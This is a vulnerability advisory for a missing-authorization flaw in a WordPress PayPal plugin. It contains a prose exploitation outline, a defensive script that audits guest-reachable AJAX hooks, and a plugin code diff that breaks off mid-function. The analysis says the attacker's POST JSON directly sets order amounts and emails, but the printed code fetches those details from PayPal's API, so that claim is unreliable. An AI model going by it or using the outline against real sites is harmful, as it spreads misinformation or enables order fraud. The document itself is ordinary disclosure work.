Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-14463: Payment Button for PayPal <= 1.2.3.41 – Missing Authorization to Unauthenticated Arbitrary Order Creation (wp-paypal)

Plugin wp-paypal
Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 1.2.3.41
Patched Version 1.2.3.42
Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14463:
The Payment Button for PayPal WordPress plugin, versions up to and including 1.2.3.41, contains a missing authorization vulnerability. This flaw allows unauthenticated attackers to create arbitrary orders in the site’s database. The vulnerability stems from a publicly accessible AJAX endpoint that processes PayPal checkout results without verifying user authentication or the legitimacy of the transaction data.

Atomic Edge research identifies the root cause as the plugin’s registration of the `wp_paypal_checkout_process_order_handler` function to the `wp_paypal_checkout_process_order` action. This action is called from the `wp_paypal_checkout_pp_api_capture_order` function, which is itself exposed as a public AJAX handler via the `wp_ajax_nopriv_wppaypalcheckout_pp_api_capture_order` hook in the file `wp-paypal/wp-paypal-checkout-api.php`. The handler function creates a WordPress post of type `wp_paypal_order` and populates its metadata using attacker-controlled data from the `order_details_data` array, which is derived from the POST request’s `data` parameter. No capability checks or nonce verification protect this endpoint.

An attacker exploits this by sending a direct POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `wppaypalcheckout_pp_api_capture_order`. The request must include a `data` parameter containing a JSON object that mimics a PayPal order capture response. This JSON object includes fields like `order_id`, `payer` (with `email_address`, `name`), `purchase_units` (with `description`, `amount`), and `payments.captures` (with `id`, `status`). The attacker can specify any transaction ID, payment amount, product description, customer name, and email address. The plugin will process this fabricated data as a legitimate order.

The patch addresses the vulnerability by removing the `wp_ajax_nopriv_wppaypalcheckout_pp_api_capture_order` hook registration. This change restricts the `wppaypalcheckout_pp_api_capture_order` AJAX endpoint to authenticated users only. The patched code also removes the `wp_ajax_nopriv_wppaypalcheckout_pp_api_create_order` hook, but the core vulnerability was in the capture endpoint, which directly triggers order creation. Before the patch, any site visitor could call the endpoint; after it, a valid WordPress user session is required, in line with the principle of least privilege.
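The root cause described above (a `wp_ajax_nopriv_*` registration whose handler performs no caller check) and the fix (dropping the `nopriv` registration) can both be checked mechanically. The Python script below is an added example, not Atomic Edge's or the plugin's code: it scans PHP source for `add_action('wp_ajax_nopriv_...')` registrations and reports each guest-reachable handler together with the WordPress caller-check calls found in its body. The sample sources are constructed: the first reproduces the plugin's hook lines with abbreviated handler bodies, the second is the same source with the `nopriv` hooks removed as the patch does, and the third is a hypothetical handler (`example_guest_handler`, a name not taken from the plugin) that at least verifies a nonce.

```python
"""Static audit of WordPress AJAX hook registrations for guest-reachable handlers
that act without any caller check (added example; not code from the plugin)."""
import re
from dataclasses import dataclass, field

# Calls whose presence suggests the handler checks the caller before acting.
# Coarse by design: a nonce proves request intent (CSRF), not authorization.
AUTH_MARKERS = ("check_ajax_referer", "wp_verify_nonce", "current_user_can", "is_user_logged_in")

# add_action('wp_ajax_[nopriv_]<action>', '<handler>')  ->  (nopriv_, action, handler)
HOOK_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(nopriv_)?([A-Za-z0-9_]+)['"]\s*,\s*['"]([A-Za-z0-9_]+)['"]"""
)


@dataclass
class Finding:
    action: str            # AJAX action name reachable via admin-ajax.php
    handler: str           # PHP function registered for it
    checks_found: list = field(default_factory=list)

    @property
    def unchecked(self) -> bool:
        return not self.checks_found


def function_body(src: str, name: str):
    """Text between the outer braces of `function name(...) {...}`, or None.
    Brace matching is naive (braces inside strings or comments are counted), which
    is acceptable for a first-pass audit of plugin source."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


def audit_nopriv_handlers(src: str) -> list:
    """One Finding per wp_ajax_nopriv_* registration, with the caller checks seen
    in the handler body (an empty list means the guest path has no check at all)."""
    findings = []
    for nopriv, action, handler in HOOK_RE.findall(src):
        if not nopriv:
            continue  # plain wp_ajax_* already requires a logged-in user
        body = function_body(src, handler) or ""
        findings.append(Finding(action, handler, [mk for mk in AUTH_MARKERS if mk in body]))
    return findings


# Constructed sample: the plugin's pre-patch hook lines with abbreviated handler bodies.
VULNERABLE_SRC = """<?php
add_action('wp_ajax_wppaypalcheckout_pp_api_create_order', 'wp_paypal_checkout_pp_api_create_order');
add_action('wp_ajax_nopriv_wppaypalcheckout_pp_api_create_order', 'wp_paypal_checkout_pp_api_create_order');
add_action('wp_ajax_wppaypalcheckout_pp_api_capture_order', 'wp_paypal_checkout_pp_api_capture_order');
add_action('wp_ajax_nopriv_wppaypalcheckout_pp_api_capture_order', 'wp_paypal_checkout_pp_api_capture_order');

function wp_paypal_checkout_pp_api_create_order(){
    $json_order_data = isset($_POST['data']) ? stripslashes_deep($_POST['data']) : '{}';
}
function wp_paypal_checkout_pp_api_capture_order(){
    $json_pp_bn_data = isset($_POST['data']) ? stripslashes_deep($_POST['data']) : '{}';
    do_action('wp_paypal_checkout_process_order', array(), array());
}
"""

# Same source with the nopriv registrations dropped, as the 1.2.3.42 patch does.
PATCHED_SRC = "\n".join(l for l in VULNERABLE_SRC.splitlines() if "wp_ajax_nopriv_" not in l)

# Hypothetical guest-reachable handler (name not from the plugin) that verifies a nonce.
NONCE_CHECKED_SRC = """<?php
add_action('wp_ajax_nopriv_example_guest_action', 'example_guest_handler');
function example_guest_handler(){
    check_ajax_referer('example_guest_nonce', 'security');
    wp_send_json_success();
}
"""


def report(src: str) -> list:
    """Human-readable lines, one per guest-reachable handler."""
    return [
        f"{'UNCHECKED' if f.unchecked else 'review'}: action={f.action} handler={f.handler} checks={f.checks_found}"
        for f in audit_nopriv_handlers(src)
    ]


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_SRC), ("patched", PATCHED_SRC), ("nonce-checked", NONCE_CHECKED_SRC)):
        print(f"== {label} ==")
        print("\n".join(report(src)) or "(no guest-reachable handlers)")
```

Run on the pre-patch sample it lists both handlers as `UNCHECKED`; on the patched sample it lists nothing, because only `wp_ajax_` registrations remain and those already require a logged-in user. The marker list is deliberately coarse: on a `nopriv` hook the nonce is handed to anonymous visitors too, so `check_ajax_referer()` stops cross-site requests but is not an authorization check, which is why a handler with a marker is flagged for review rather than reported as safe.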

Successful exploitation corrupts the order database with fraudulent entries, potentially disrupting business records and analytics. If the plugin’s email functionality is enabled, the attack triggers purchase receipt emails to any address supplied in the `payer.email_address` field, leading to unauthorized email dispatch and potential spam or phishing vectors. Attackers can also pollute the database with arbitrary data via the `custom` and `variation` fields. This vulnerability does not directly lead to site takeover or code execution, but it enables fraud and denial-of-service against the order management system.

Differential between vulnerable and patched code

Code Diff
--- a/wp-paypal/wp-paypal-checkout-api.php
+++ b/wp-paypal/wp-paypal-checkout-api.php
@@ -0,0 +1,638 @@
+<?php
+add_action('wp_ajax_wppaypalcheckout_pp_api_create_order', 'wp_paypal_checkout_pp_api_create_order');
+add_action('wp_ajax_nopriv_wppaypalcheckout_pp_api_create_order', 'wp_paypal_checkout_pp_api_create_order');
+add_action('wp_ajax_wppaypalcheckout_pp_api_capture_order', 'wp_paypal_checkout_pp_api_capture_order');
+add_action('wp_ajax_nopriv_wppaypalcheckout_pp_api_capture_order', 'wp_paypal_checkout_pp_api_capture_order');
+add_action('wp_paypal_checkout_process_order', 'wp_paypal_checkout_process_order_handler', 10, 2);
+
+function wp_paypal_checkout_pp_api_create_order(){
+    //The data will be in JSON format string (not actual JSON object). By using json_decode it can be converted to a json object or array.
+    $json_order_data = isset($_POST['data']) ? stripslashes_deep($_POST['data']) : '{}';
+    $order_data_array = json_decode($json_order_data, true);
+    $encoded_item_description = isset($order_data_array['purchase_units'][0]['description']) ? $order_data_array['purchase_units'][0]['description'] : '';
+    $decoded_item_description = html_entity_decode($encoded_item_description);
+    wp_paypal_debug_log("Checkout - Create-order request received for item: ".$decoded_item_description, true);
+
+    //Set this decoded item name back to the order data.
+    $order_data_array['purchase_units'][0]['description'] = $decoded_item_description;
+    wp_paypal_debug_log_array($order_data_array, true);
+    if(empty($json_order_data)){
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Empty data received.', 'wp-paypal'),
+            )
+        );
+    }
+    $options = wp_paypal_checkout_get_option();
+    $currency_code = $options['currency_code'];
+    $description = $order_data_array['purchase_units'][0]['description'];
+    $amount = $order_data_array['purchase_units'][0]['amount']['value'];
+    $total_amount = $amount;
+    wp_paypal_debug_log("Checkout - Creating order data to send to PayPal: ", true);
+    $pp_api_order_data = [
+        "intent" => "CAPTURE",
+        "payment_source" => [
+            "paypal" => [
+                "experience_context" => [
+                    "payment_method_preference" => "IMMEDIATE_PAYMENT_REQUIRED",
+                ]
+            ]
+        ],
+        "purchase_units" => [
+            [
+                "description" => $description,
+                "amount" => [
+                    "value" => (string) $total_amount,
+                    "currency_code" => $currency_code,
+                ],
+            ]
+        ]
+    ];
+    //
+    $shipping_preference = '';
+    if(isset($order_data_array['payment_source']['paypal']['experience_context']['shipping_preference'])
+            && !empty($order_data_array['payment_source']['paypal']['experience_context']['shipping_preference'])){
+        $shipping_preference = $order_data_array['payment_source']['paypal']['experience_context']['shipping_preference'];
+        $pp_api_order_data['payment_source']['paypal']['experience_context']['shipping_preference'] = $shipping_preference;
+    }
+    //
+    $amount_breakdown = false;
+    //shipping
+    if(isset($order_data_array['purchase_units'][0]['amount']['breakdown']['shipping']['value'])
+            && is_numeric($order_data_array['purchase_units'][0]['amount']['breakdown']['shipping']['value'])
+                && $order_data_array['purchase_units'][0]['amount']['breakdown']['shipping']['value'] > 0){
+        $shipping = $order_data_array['purchase_units'][0]['amount']['breakdown']['shipping']['value'];
+        $pp_api_order_data['purchase_units'][0]['amount']['breakdown']['shipping']['currency_code'] = $currency_code;
+        $pp_api_order_data['purchase_units'][0]['amount']['breakdown']['shipping']['value'] = (string) $shipping;
+        $total_amount = $amount + $shipping;
+        $amount_breakdown = true;
+    }
+    //break down amount when needed
+    if($amount_breakdown){
+        $pp_api_order_data['purchase_units'][0]['amount']['breakdown']['item_total']['currency_code'] = $currency_code;
+        $pp_api_order_data['purchase_units'][0]['amount']['breakdown']['item_total']['value'] = (string) $amount;
+        $pp_api_order_data['purchase_units'][0]['amount']['value'] = (string) $total_amount;
+    }
+    //
+    $json_encoded_pp_api_order_data = wp_json_encode($pp_api_order_data);
+    wp_paypal_debug_log_array($json_encoded_pp_api_order_data, true);
+    $access_token = wp_paypal_checkout_get_paypal_access_token();
+    if (!$access_token) {
+        wp_paypal_debug_log('Checkout - Access token could not be created using PayPal API', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Checkout - Access token could not be created using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $url = 'https://api-m.paypal.com/v2/checkout/orders';
+    if(isset($options['test_mode']) && $options['test_mode'] == "1"){
+        $url = 'https://api-m.sandbox.paypal.com/v2/checkout/orders';
+    }
+    $response = wp_safe_remote_post($url, array(
+        'method' => 'POST',
+        'headers' => array(
+            'Authorization' => 'Bearer ' . $access_token,
+            'Content-Type' => 'application/json'
+        ),
+        'body' => $json_encoded_pp_api_order_data
+    ));
+
+    if (is_wp_error($response)) {
+        wp_paypal_debug_log('Checkout - Error response', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg'  => __('Failed to create the order using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+
+    $body = wp_remote_retrieve_body($response);
+    if(!isset($body) || empty($body)){
+        wp_paypal_debug_log('Checkout - Error response from invalid body', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Invalid response body from PayPal API order creation.', 'wp-paypal'),
+            )
+        );
+    }
+    $data = json_decode($body);
+    if(!isset($data) || empty($data)){
+        wp_paypal_debug_log('Checkout - Invalid response data from PayPal API order creation', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Invalid response data from PayPal API order creation.', 'wp-paypal'),
+            )
+        );
+    }
+    wp_paypal_debug_log('Response data from order creation', true);
+    wp_paypal_debug_log_array($data, true);
+    if(!isset($data->id) || empty($data->id)){
+        wp_paypal_debug_log('Checkout - No order ID from PayPal API order creation', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('No order ID from PayPal API order creation.', 'wp-paypal'),
+            )
+        );
+    }
+    $paypal_order_id = $data->id;
+    wp_send_json(
+        array(
+            'success' => true,
+            'order_id' => $paypal_order_id,
+            'additional_data' => array(),
+        )
+    );
+}
+
+function wp_paypal_checkout_get_paypal_access_token() {
+    $options = wp_paypal_checkout_get_option();
+    $url = 'https://api-m.paypal.com/v1/oauth2/token';
+    $client_id = $options['app_client_id'];
+    $secret_key = $options['app_secret_key'];
+    if(isset($options['test_mode']) && $options['test_mode'] == "1"){
+        $url = 'https://api-m.sandbox.paypal.com/v1/oauth2/token';
+        $client_id = $options['app_sandbox_client_id'];
+        $secret_key = $options['app_sandbox_secret_key'];
+    }
+    if(!isset($client_id) || empty($client_id)){
+        wp_paypal_debug_log('Checkout - No client ID. Access token cannot be created.', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Failed to create an access token using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    if(!isset($secret_key) || empty($secret_key)){
+        wp_paypal_debug_log('Checkout - No secret key. Access token cannot be created.', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Failed to create an access token using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $secret_key = base64_decode($secret_key);
+    $auth = base64_encode($client_id . ':' . $secret_key);
+    wp_paypal_debug_log('Creating access token', true);
+    $response = wp_safe_remote_post($url, array(
+        'method' => 'POST',
+        'headers' => array(
+            'Authorization' => 'Basic ' . $auth,
+            'Content-Type' => 'application/x-www-form-urlencoded'
+        ),
+        'body' => 'grant_type=client_credentials'
+    ));
+
+    if (is_wp_error($response)) {
+        wp_paypal_debug_log('Error response', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Failed to create an access token using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+
+    $body = wp_remote_retrieve_body($response);
+    if(!isset($body) || empty($body)){
+        wp_paypal_debug_log('Error response from invalid body', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Invalid response body when creating an access token using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $data = json_decode($body);
+    wp_paypal_debug_log('Response data for access token', true);
+    wp_paypal_debug_log_array($data, true);
+    if(!isset($data->access_token) || empty($data->access_token)){
+        wp_paypal_debug_log('No valid access token from PayPal API response', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('No valid access token from PayPal API response.', 'wp-paypal'),
+            )
+        );
+    }
+
+    return $data->access_token;
+}
+
+function wp_paypal_checkout_pp_api_capture_order(){
+    $json_pp_bn_data = isset( $_POST['data'] ) ? stripslashes_deep( $_POST['data'] ) : '{}';
+    $array_pp_bn_data = json_decode( $json_pp_bn_data, true );
+    $order_id = isset( $array_pp_bn_data['order_id'] ) ? sanitize_text_field($array_pp_bn_data['order_id']) : '';
+    $checkoutvar = isset( $array_pp_bn_data['checkoutvar'] ) ? $array_pp_bn_data['checkoutvar'] : array();
+    wp_paypal_debug_log('Checkout - PayPal capture order request received - PayPal order ID: ' . $order_id, true);
+    if(empty($order_id)){
+        wp_paypal_debug_log('Checkout - Empty order ID received from PayPal capture order request', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Error! Empty order ID received for PayPal capture order request.', 'wp-paypal'),
+            )
+        );
+    }
+    wp_paypal_debug_log("Creating data to send to PayPal for capturing the order: ", true);
+    $api_params = array( 'order_id' => $order_id );
+    $json_api_params = json_encode($api_params);
+    wp_paypal_debug_log_array($json_api_params, true);
+    $access_token = wp_paypal_checkout_get_paypal_access_token();
+    if (!$access_token) {
+        wp_paypal_debug_log('Checkout - Access token could not be created using PayPal API', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Access token could not be created using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $options = wp_paypal_checkout_get_option();
+    $url = 'https://api-m.paypal.com/v2/checkout/orders';
+    if(isset($options['test_mode']) && $options['test_mode'] == "1"){
+        $url = 'https://api-m.sandbox.paypal.com/v2/checkout/orders';
+    }
+    $url .= '/'.$order_id.'/capture';
+    $response = wp_safe_remote_post($url, array(
+        'method' => 'POST',
+        'headers' => array(
+            'Authorization' => 'Bearer ' . $access_token,
+            'Content-Type' => 'application/json'
+        ),
+        'body' => $json_api_params
+    ));
+    if (is_wp_error($response)) {
+        wp_paypal_debug_log('Error response', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Failed to capture the order using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+
+    $body = wp_remote_retrieve_body($response);
+    if(!isset($body) || empty($body)){
+        wp_paypal_debug_log('Error response from invalid body', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Invalid response body from PayPal API order capture.', 'wp-paypal'),
+            )
+        );
+    }
+    $capture_response_data = json_decode($body, true);
+    if(!isset($capture_response_data) || empty($capture_response_data)){
+        wp_paypal_debug_log('Empty response data', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Empty response data from PayPal API order capture.', 'wp-paypal'),
+            )
+        );
+    }
+    wp_paypal_debug_log('Response data from order capture', true);
+    wp_paypal_debug_log_array($capture_response_data, true);
+    //
+    wp_paypal_debug_log('Checkout - Retrieving order details', true);
+    $url = 'https://api-m.paypal.com/v2/checkout/orders';
+    if(isset($options['test_mode']) && $options['test_mode'] == "1"){
+        $url = 'https://api-m.sandbox.paypal.com/v2/checkout/orders';
+    }
+    $url .= '/'.$order_id;
+    $order_response = wp_safe_remote_get($url, array(
+        'headers' => array(
+            'Authorization' => 'Bearer ' . $access_token,
+            'Content-Type' => 'application/json'
+        ),
+    ));
+    if (is_wp_error($order_response)) {
+        wp_paypal_debug_log('Error response', false);
+        wp_paypal_debug_log_array($order_response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Failed to retrieve order details using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $order_body = wp_remote_retrieve_body($order_response);
+    if(!isset($order_body) || empty($order_body)){
+        wp_paypal_debug_log('Error response from invalid body', false);
+        wp_paypal_debug_log_array($order_response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Invalid response body from retrieving order details using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $order_details_data = json_decode($order_body, true);
+    if(!isset($order_details_data) || empty($order_details_data)){
+        wp_paypal_debug_log('Empty response data from retrieving order details', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Empty response data from PayPal API order details.', 'wp-paypal'),
+            )
+        );
+    }
+    wp_paypal_debug_log('Response data from retrieving order details', true);
+    wp_paypal_debug_log_array($order_details_data, true);
+    //
+    do_action('wp_paypal_checkout_process_order', $order_details_data, $checkoutvar);
+    wp_send_json_success();
+}
+
+function wp_paypal_checkout_process_order_handler($order_details_data, $checkoutvar)
+{
+    if(!isset($order_details_data['payer'])){
+        wp_paypal_debug_log("Checkout - No payer data. This payment cannot be processed.", false);
+        return;
+    }
+    $payer = $order_details_data['payer'];
+    if(!isset($order_details_data['purchase_units'][0])){
+        wp_paypal_debug_log("Checkout - No purchase unit data. This payment cannot be processed.", false);
+        return;
+    }
+    $purchase_units = $order_details_data['purchase_units'][0];
+    if(!isset($purchase_units['payments']['captures'][0])){
+        wp_paypal_debug_log("Checkout - No payment capture data. This payment cannot be processed.", false);
+        return;
+    }
+    $capture = $purchase_units['payments']['captures'][0];
+    $payment_status = '';
+    if (isset($capture['status'])) {
+        $payment_status = sanitize_text_field($capture['status']);
+        wp_paypal_debug_log("Checkout - Payment Status - " . $payment_status, true);
+    }
+    if (isset($capture['status']['status_details']['reason'])) {
+        $status_reason = sanitize_text_field($capture['status']['status_details']['reason']);
+        wp_paypal_debug_log("Checkout - Reason - " . $status_reason, true);
+    }
+    $payment_data = array();
+    $payment_data['txn_id'] = '';
+    if (isset($capture['id'])) {
+        $payment_data['txn_id'] = sanitize_text_field($capture['id']);
+    } else {
+        wp_paypal_debug_log("Checkout - No transaction ID. This payment cannot be processed.", false);
+        return;
+    }
+    $args = array(
+        'post_type' => 'wp_paypal_order',
+        'meta_query' => array(
+            array(
+                'key' => '_txn_id',
+                'value' => $payment_data['txn_id'],
+                'compare' => '=',
+            ),
+        ),
+    );
+    $query = new WP_Query($args);
+    if ($query->have_posts()) {  //a record already exists
+        wp_paypal_debug_log("Checkout - An order with this transaction ID already exists. This payment will not be processed.", false);
+        return;
+    }
+    $payer_name = '';
+    $payment_data['given_name'] = '';
+    $payment_data['first_name'] = '';
+    if (isset($payer['name']['given_name'])) {
+        $payment_data['given_name'] = sanitize_text_field($payer['name']['given_name']);
+        $given_name_parts = explode(" ", $payment_data['given_name']);
+        if(isset($given_name_parts[0]) && !empty($given_name_parts[0])){
+            $payment_data['first_name'] = sanitize_text_field($given_name_parts[0]);
+        }
+        $payer_name .= $payment_data['given_name'];
+    }
+    $payment_data['last_name'] = '';
+    if (isset($payer['name']['surname'])) {
+        $payment_data['last_name'] = sanitize_text_field($payer['name']['surname']);
+        $payer_name .= ' '.$payment_data['last_name'];
+    }
+    $payment_data['payer_email'] = '';
+    if (isset($payer['email_address'])) {
+        $payment_data['payer_email'] = sanitize_email($payer['email_address']);
+    }
+    $payment_data['item_names'] = '';
+    $payment_data['description'] = '';
+    if (isset($purchase_units['description'])) {
+        $payment_data['description'] = sanitize_text_field($purchase_units['description']);
+        $payment_data['item_names'] = $payment_data['description'];
+    }
+    $payment_data['mc_gross'] = '';
+    if (isset($purchase_units['amount']['value'])) {
+        $payment_data['mc_gross'] = sanitize_text_field($purchase_units['amount']['value']);
+    }
+    $payment_data['currency_code'] = '';
+    if (isset($purchase_units['amount']['currency_code'])) {
+        $payment_data['currency_code'] = sanitize_text_field($purchase_units['amount']['currency_code']);
+    }
+    $payment_data['custom'] = '';
+    if (isset($checkoutvar['custom']) && !empty($checkoutvar['custom'])) {
+        $payment_data['custom'] = sanitize_text_field($checkoutvar['custom']);
+    }
+    $payment_data['variation'] = '';
+    if (isset($checkoutvar['variation']) && !empty($checkoutvar['variation'])) {
+        $payment_data['variation'] = sanitize_text_field($checkoutvar['variation']);
+    }
+    $payment_data['shipping_name'] = '';
+    if (isset($purchase_units['shipping']['name'])) {
+        $payment_data['shipping_name'] = isset($purchase_units['shipping']['name']['full_name']) ? sanitize_text_field($purchase_units['shipping']['name']['full_name']) : '';
+    }
+    $ship_to = '';
+    $shipping_address = '';
+    if (isset($purchase_units['shipping']['address'])) {
+        $address_street = isset($purchase_units['shipping']['address']['address_line_1']) ? sanitize_text_field($purchase_units['shipping']['address']['address_line_1']) : '';
+        $ship_to .= !empty($address_street) ? $address_street.'<br />' : '';
+        $shipping_address .= !empty($address_street) ? $address_street.', ' : '';
+
+        $address_city = isset($purchase_units['shipping']['address']['admin_area_2']) ? sanitize_text_field($purchase_units['shipping']['address']['admin_area_2']) : '';
+        $ship_to .= !empty($address_city) ? $address_city.', ' : '';
+        $shipping_address .= !empty($address_city) ? $address_city.', ' : '';
+
+        $address_state = isset($purchase_units['shipping']['address']['admin_area_1']) ? sanitize_text_field($purchase_units['shipping']['address']['admin_area_1']) : '';
+        $ship_to .= !empty($address_state) ? $address_state.' ' : '';
+        $shipping_address .= !empty($address_state) ? $address_state.' ' : '';
+
+        $address_zip = isset($purchase_units['shipping']['address']['postal_code']) ? sanitize_text_field($purchase_units['shipping']['address']['postal_code']) : '';
+        $ship_to .= !empty($address_zip) ? $address_zip.'<br />' : '';
+        $shipping_address .= !empty($address_zip) ? $address_zip.', ' : '';
+
+        $address_country = isset($purchase_units['shipping']['address']['country_code']) ? sanitize_text_field($purchase_units['shipping']['address']['country_code']) : '';
+        $ship_to .= !empty($address_country) ? $address_country : '';
+        $shipping_address .= !empty($address_country) ? $address_country : '';
+    }
+    $payment_data['shipping_address'] = $shipping_address;
+    $wp_paypal_order = array(
+        'post_title' => 'order',
+        'post_type' => 'wp_paypal_order',
+        'post_content' => '',
+        'post_status' => 'publish',
+    );
+    wp_paypal_debug_log("Checkout - Inserting order information", true);
+    $post_id = wp_insert_post($wp_paypal_order, true);
+    if (is_wp_error($post_id)) {
+        wp_paypal_debug_log("Checkout - Error inserting order information: ".$post_id->get_error_message(), false);
+        return;
+    }
+    if (!$post_id) {
+        wp_paypal_debug_log("Checkout - Order information could not be inserted", false);
+        return;
+    }
+    $post_updated = false;
+    if ($post_id > 0) {
+        $post_content = '';
+        if(!empty($payment_data['description'])){
+            $post_content .= '<strong>Description:</strong> '.$payment_data['description'].'<br />';
+        }
+        if(isset($payment_data['custom']) && !empty($payment_data['custom'])){
+            $post_content .= '<strong>Custom:</strong> '.$payment_data['custom'].'<br />';
+        }
+        if(isset($payment_data['variation']) && !empty($payment_data['variation'])){
+            $post_content .= '<strong>Variation:</strong> '.$payment_data['variation'].'<br />';
+        }
+        if(!empty($payment_data['mc_gross'])){
+            $post_content .= '<strong>Amount:</strong> '.$payment_data['mc_gross'].'<br />';
+        }
+        if(!empty($payment_data['mc_currency'])){
+            $post_content .= '<strong>Currency:</strong> '.$payment_data['mc_currency'].'<br />';
+        }
+        if(!empty($payer_name)){
+            $post_content .= '<strong>Payer Name:</strong> '.$payer_name.'<br />';
+        }
+        if(!empty($payment_data['payer_email'])){
+            $post_content .= '<strong>Email:</strong> '.$payment_data['payer_email'].'<br />';
+        }
+        if(!empty($ship_to)){
+            $ship_to = '<h2>'.__('Ship To', 'wp-paypal').'</h2><br />'.$payment_data['shipping_name'].'<br />'.$ship_to.'<br />';
+        }
+        $post_content .= $ship_to;
+        $post_content .= '<h2>'.__('Payment Data', 'wp-paypal').'</h2><br />';
+        $post_content .= print_r($order_details_data, true);
+        $updated_post = array(
+            'ID' => $post_id,
+            'post_title' => $post_id,
+            'post_type' => 'wp_paypal_order',
+            'post_content' => $post_content
+        );
+        $updated_post_id = wp_update_post($updated_post, true);
+        if (is_wp_error($updated_post_id)) {
+            wp_paypal_debug_log("Checkout - Error updating order information: ".$updated_post_id->get_error_message(), false);
+            return;
+        }
+        if (!$updated_post_id) {
+            wp_paypal_debug_log("Checkout - Order information could not be updated", false);
+            return;
+        }
+        if ($updated_post_id > 0) {
+            $post_updated = true;
+        }
+    }
+    //save order information
+    if ($post_updated) {
+        update_post_meta($post_id, '_txn_id', $payment_data['txn_id']);
+        update_post_meta($post_id, '_first_name', $payment_data['first_name']);
+        update_post_meta($post_id, '_last_name', $payment_data['last_name']);
+        update_post_meta($post_id, '_payer_email', $payment_data['payer_email']);
+        update_post_meta($post_id, '_mc_gross', $payment_data['mc_gross']);
+        update_post_meta($post_id, '_payment_status', $payment_status);
+        update_post_meta($post_id, '_custom', $payment_data['custom']);
+        update_post_meta($post_id, '_payment_data', $payment_data);
+        wp_paypal_debug_log("Checkout - Order information updated", true);
+
+        $email_options = wp_paypal_get_email_option();
+        add_filter('wp_mail_from', 'wp_paypal_set_email_from');
+        add_filter('wp_mail_from_name', 'wp_paypal_set_email_from_name');
+        $purchase_email_body = '';
+        if(isset($email_options['purchase_email_enabled']) && !empty($email_options['purchase_email_enabled']) && !empty($payment_data['payer_email'])){
+            $subject = $email_options['purchase_email_subject'];
+            $subject = wp_paypal_do_email_tags($payment_data, $subject);
+            $type = $email_options['purchase_email_type'];
+            $body = $email_options['purchase_email_body'];
+            $body = wp_paypal_do_email_tags($payment_data, $body);
+            if($type == "html"){
+                add_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
+                $body = apply_filters('wp_paypal_email_body_wpautop', true) ? wpautop($body) : $body;
+            }
+            //
+            if(isset($body) && !empty($body)){
+                $purchase_email_body = $body;
+            }
+            //
+            wp_paypal_debug_log("Sending a purchase receipt email to ".$payment_data['payer_email'], true);
+            $mail_sent = wp_mail($payment_data['payer_email'], $subject, $body);
+            if($type == "html"){
+                remove_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
+            }
+            if($mail_sent == true){
+                wp_paypal_debug_log("Checkout - Email was sent successfully by WordPress", true);
+            }
+            else{
+                wp_paypal_debug_log("Checkout - Email could not be sent by WordPress", false);
+            }
+        }
+        if(isset($email_options['sale_notification_email_enabled']) && !empty($email_options['sale_notification_email_enabled']) && !empty($email_options['sale_notification_email_recipient'])){
+            $subject = $email_options['sale_notification_email_subject'];
+            $subject = wp_paypal_do_email_tags($payment_data, $subject);
+            $type = $email_options['sale_notification_email_type'];
+            $body = $email_options['sale_notification_email_body'];
+            $body = wp_paypal_do_email_tags($payment_data, $body);
+            if($type == "html"){
+                add_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
+                $body = apply_filters('wp_paypal_email_body_wpautop', true) ? wpautop($body) : $body;
+            }
+            //
+            if(isset($email_options['sale_notification_email_append_purchase_email']) && !empty($email_options['sale_notification_email_append_purchase_email'])){
+                $appended_content = PHP_EOL.PHP_EOL.'---Purchase Receipt Email---'.PHP_EOL.PHP_EOL;
+                if($type == "html"){
+                    $appended_content = wpautop($appended_content);
+                }
+                $appended_content .= $purchase_email_body;
+                $body .= $appended_content;
+            }
+            //
